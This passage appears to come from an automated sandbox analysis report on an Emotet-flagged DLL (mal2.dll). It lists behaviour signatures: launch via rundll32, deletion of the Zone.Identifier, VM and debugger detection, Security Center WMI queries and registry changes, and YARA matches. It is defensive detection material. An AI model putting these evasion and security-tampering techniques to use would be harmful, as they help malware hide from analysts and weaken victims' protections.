                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: mal2.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: mal2.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000014.00000003.596491240.00000000045E1000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.625997812.0000000005561000.00000004.00000001.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000014.00000003.596491240.00000000045E1000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.625997812.0000000005561000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000014.00000003.594790225.00000000005D3000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.594905984.00000000005D3000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.594721838.0000000004257000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.596491240.00000000045E1000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.625997812.0000000005561000.00000004.00000001.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000014.00000003.596491240.00000000045E1000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.625997812.0000000005561000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000014.00000003.594862234.00000000005D9000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.594794787.00000000005D9000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.596491240.00000000045E1000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.625997812.0000000005561000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000014.00000003.596491240.00000000045E1000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.625997812.0000000005561000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000014.00000003.594862234.00000000005D9000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.594794787.00000000005D9000.00000004.00000001.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000014.00000003.596491240.00000000045E1000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.625997812.0000000005561000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000014.00000003.594790225.00000000005D3000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.594905984.00000000005D3000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000014.00000003.596491240.00000000045E1000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.625997812.0000000005561000.00000004.00000001.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000014.00000003.596491240.00000000045E1000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.625997812.0000000005561000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000014.00000003.596491240.00000000045E1000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.625997812.0000000005561000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000014.00000003.596491240.00000000045E1000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.625997812.0000000005561000.00000004.00000001.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000014.00000003.596491240.00000000045E1000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.625997812.0000000005561000.00000004.00000001.sdmp
                      Source: Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000014.00000002.605555284.0000000000162000.00000004.00000001.sdmp
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D151C push ds; ret 0_2_003D1527
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D150F push ds; ret 0_2_003D1527
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E9F9153 push ecx; ret 0_2_6E9F9166
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02826496 push ecx; retf 3_2_02826497
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0281150F push ds; ret 3_2_02811527
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0281151C push ds; ret 3_2_02811527
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0282B16F push ss; retf 3_2_0282B182
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9F9153 push ecx; ret 3_2_6E9F9166
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FE6496 push ecx; retf 4_2_02FE6497
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FEB16F push ss; retf 4_2_02FEB182
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FD151C push ds; ret 4_2_02FD1527
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FD150F push ds; ret 4_2_02FD1527
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0331151C push ds; ret 6_2_03311527
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0331150F push ds; ret 6_2_03311527
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0332B16F push ss; retf 6_2_0332B182
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03326496 push ecx; retf 6_2_03326497
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C76496 push ecx; retf 7_2_02C76497
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C7B16F push ss; retf 7_2_02C7B182
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C6150F push ds; ret 7_2_02C61527
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C6151C push ds; ret 7_2_02C61527
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E9DE4E0 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,CreateMutexA,CloseHandle,ReleaseMutex,0_2_6E9DE4E0
                      Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Uikrpc\tumwlrzamddm.oliJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Uikrpc\tumwlrzamddm.oli:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exe TID: 2168Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 4720Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeAPI coverage: 6.9 %
                      Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 9.3 %
                      Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E9F2FE7 FindFirstFileExW,0_2_6E9F2FE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9F2FE7 FindFirstFileExW,3_2_6E9F2FE7
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: Amcache.hve.20.drBinary or memory string: VMware
                      Source: Amcache.hve.20.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: Amcache.hve.20.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: Amcache.hve.20.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.20.drBinary or memory string: VMware, Inc.
                      Source: svchost.exe, 00000005.00000002.627977305.0000017C92263000.00000004.00000001.sdmpBinary or memory string: @Hyper-V RAW
                      Source: Amcache.hve.20.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
                      Source: Amcache.hve.20.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.20.drBinary or memory string: VMware7,1
                      Source: Amcache.hve.20.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.20.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Amcache.hve.20.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: svchost.exe, 00000005.00000002.627940866.0000017C92256000.00000004.00000001.sdmp, svchost.exe, 00000005.00000002.626695848.0000017C8CC29000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000002.647786579.0000000004D50000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.645558527.0000000004D80000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000002.647849827.0000000004D82000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.20.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.20.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.20.drBinary or memory string: VMware, Inc.me
                      Source: Amcache.hve.20.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: Amcache.hve.20.drBinary or memory string: VMware-42 35 44 6e 75 85 11 47-bd a2 bb ed 21 43 9f 89
                      Source: svchost.exe, 00000008.00000002.785008131.0000020F91447000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.785032852.00000183EA629000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: Amcache.hve.20.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E9ED1CC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E9ED1CC
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E9DE4E0 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,CreateMutexA,CloseHandle,ReleaseMutex,0_2_6E9DE4E0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E9D1290 GetProcessHeap,HeapAlloc,HeapFree,0_2_6E9D1290
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003E4315 mov eax, dword ptr fs:[00000030h]0_2_003E4315
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E9EC050 mov eax, dword ptr fs:[00000030h]0_2_6E9EC050
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E9EBFE0 mov esi, dword ptr fs:[00000030h]0_2_6E9EBFE0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E9EBFE0 mov eax, dword ptr fs:[00000030h]0_2_6E9EBFE0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E9F12CB mov ecx, dword ptr fs:[00000030h]0_2_6E9F12CB
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E9F298C mov eax, dword ptr fs:[00000030h]0_2_6E9F298C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02824315 mov eax, dword ptr fs:[00000030h]3_2_02824315
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9EC050 mov eax, dword ptr fs:[00000030h]3_2_6E9EC050
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9EBFE0 mov esi, dword ptr fs:[00000030h]3_2_6E9EBFE0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9EBFE0 mov eax, dword ptr fs:[00000030h]3_2_6E9EBFE0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9F12CB mov ecx, dword ptr fs:[00000030h]3_2_6E9F12CB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9F298C mov eax, dword ptr fs:[00000030h]3_2_6E9F298C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FE4315 mov eax, dword ptr fs:[00000030h]4_2_02FE4315
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03324315 mov eax, dword ptr fs:[00000030h]6_2_03324315
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C74315 mov eax, dword ptr fs:[00000030h]7_2_02C74315
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003DE259 LdrInitializeThunk,0_2_003DE259
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E9ECB22 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6E9ECB22
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E9ED1CC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E9ED1CC
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E9F29E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E9F29E6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9ECB22 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6E9ECB22
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9ED1CC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6E9ED1CC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9F29E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6E9F29E6
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\mal2.dll",#1Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 7004 -ip 7004Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7004 -s 308Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 7004 -ip 7004Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7004 -s 316Jump to behavior
                      Source: loaddll32.exe, 00000000.00000000.587470412.0000000000F60000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.609050621.0000000000F60000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.610170018.0000000000F60000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.583006509.0000000000F60000.00000002.00020000.sdmp, rundll32.exe, 0000001D.00000002.787416473.0000000002DB0000.00000002.00020000.sdmpBinary or memory string: uProgram Manager
                      Source: loaddll32.exe, 00000000.00000000.587470412.0000000000F60000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.609050621.0000000000F60000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.610170018.0000000000F60000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.583006509.0000000000F60000.00000002.00020000.sdmp, rundll32.exe, 0000001D.00000002.787416473.0000000002DB0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000000.587470412.0000000000F60000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.609050621.0000000000F60000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.610170018.0000000000F60000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.583006509.0000000000F60000.00000002.00020000.sdmp, rundll32.exe, 0000001D.00000002.787416473.0000000002DB0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000000.587470412.0000000000F60000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.609050621.0000000000F60000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.610170018.0000000000F60000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.583006509.0000000000F60000.00000002.00020000.sdmp, rundll32.exe, 0000001D.00000002.787416473.0000000002DB0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E9ECC44 cpuid 0_2_6E9ECC44
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E9ECE15 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6E9ECE15

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      barindex
                      Changes security center settings (notifications, updates, antivirus, firewall)Show sources
                      Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                      Source: Amcache.hve.20.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: svchost.exe, 0000000C.00000002.784851404.000001B3C2A40000.00000004.00000001.sdmpBinary or memory string: (@V%ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: svchost.exe, 0000000C.00000002.785074018.000001B3C2B02000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 4.2.rundll32.exe.33f3568.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.3d0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.3d0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.3d0000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.34a3590.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.3d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.2fd0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.2b90000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.3d0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.3d0000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.3d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.2e43620.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.3310000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.2e43620.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.743608.7.raw.unpack, type: UNPACKEDPE
